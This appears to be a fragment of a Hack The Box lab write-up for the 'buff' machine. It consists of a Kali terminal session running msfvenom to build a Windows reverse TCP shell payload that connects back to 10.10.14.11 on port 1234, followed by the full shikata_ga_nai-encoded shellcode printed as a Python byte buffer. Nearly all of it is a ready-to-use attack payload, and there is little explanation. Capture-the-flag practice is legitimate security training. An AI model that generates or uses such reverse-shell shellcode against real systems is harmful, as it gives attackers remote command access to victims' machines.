msfvenom
┌──(kali㉿kali)-[~/archive/htb/labs/buff]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.11 LPORT=1234 -b '\x00\x0A\x0D' -f python
[-] no platform was selected, choosing msf::Module::Platform::Windows from the payload
[-] no arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
payload size: 351 bytes
final size of python file: 1745 bytes
buf = b""
buf += b"\xd9\xc1\xd9\x74\x24\xf4\xba\x39\x94\x7a\xcb\x5b"
buf += b"\x2b\xc9\xb1\x52\x83\xeb\xfc\x31\x53\x13\x03\x6a"
buf += b"\x87\x98\x3e\x70\x4f\xde\xc1\x88\x90\xbf\x48\x6d"
buf += b"\xa1\xff\x2f\xe6\x92\xcf\x24\xaa\x1e\xbb\x69\x5e"
buf += b"\x94\xc9\xa5\x51\x1d\x67\x90\x5c\x9e\xd4\xe0\xff"
buf += b"\x1c\x27\x35\xdf\x1d\xe8\x48\x1e\x59\x15\xa0\x72"
buf += b"\x32\x51\x17\x62\x37\x2f\xa4\x09\x0b\xa1\xac\xee"
buf += b"\xdc\xc0\x9d\xa1\x57\x9b\x3d\x40\xbb\x97\x77\x5a"
buf += b"\xd8\x92\xce\xd1\x2a\x68\xd1\x33\x63\x91\x7e\x7a"
buf += b"\x4b\x60\x7e\xbb\x6c\x9b\xf5\xb5\x8e\x26\x0e\x02"
buf += b"\xec\xfc\x9b\x90\x56\x76\x3b\x7c\x66\x5b\xda\xf7"
buf += b"\x64\x10\xa8\x5f\x69\xa7\x7d\xd4\x95\x2c\x80\x3a"
buf += b"\x1c\x76\xa7\x9e\x44\x2c\xc6\x87\x20\x83\xf7\xd7"
buf += b"\x8a\x7c\x52\x9c\x27\x68\xef\xff\x2f\x5d\xc2\xff"
buf += b"\xaf\xc9\x55\x8c\x9d\x56\xce\x1a\xae\x1f\xc8\xdd"
buf += b"\xd1\x35\xac\x71\x2c\xb6\xcd\x58\xeb\xe2\x9d\xf2"
buf += b"\xda\x8a\x75\x02\xe2\x5e\xd9\x52\x4c\x31\x9a\x02"
buf += b"\x2c\xe1\x72\x48\xa3\xde\x63\x73\x69\x77\x09\x8e"
buf += b"\xfa\x72\xc4\x9e\xf1\xea\xda\x9e\x01\x39\x53\x78"
buf += b"\x63\xad\x32\xd3\x1c\x54\x1f\xaf\xbd\x99\xb5\xca"
buf += b"\xfe\x12\x3a\x2b\xb0\xd2\x37\x3f\x25\x13\x02\x1d"
buf += b"\xe0\x2c\xb8\x09\x6e\xbe\x27\xc9\xf9\xa3\xff\x9e"
buf += b"\xae\x12\xf6\x4a\x43\x0c\xa0\x68\x9e\xc8\x8b\x28"
buf += b"\x45\x29\x15\xb1\x08\x15\x31\xa1\xd4\x96\x7d\x95"
buf += b"\x88\xc0\x2b\x43\x6f\xbb\x9d\x3d\x39\x10\x74\xa9"
buf += b"\xbc\x5a\x47\xaf\xc0\xb6\x31\x4f\x70\x6f\x04\x70"
buf += b"\xbd\xe7\x80\x09\xa3\x97\x6f\xc0\x67\xa7\x25\x48"
buf += b"\xc1\x20\xe0\x19\x53\x2d\x13\xf4\x90\x48\x90\xfc"
buf += b"\x68\xaf\x88\x75\x6c\xeb\x0e\x66\x1c\x64\xfb\x88"
buf += b"\xb3\x85\x2e"
msfvenom generated a shellcode for reverse shell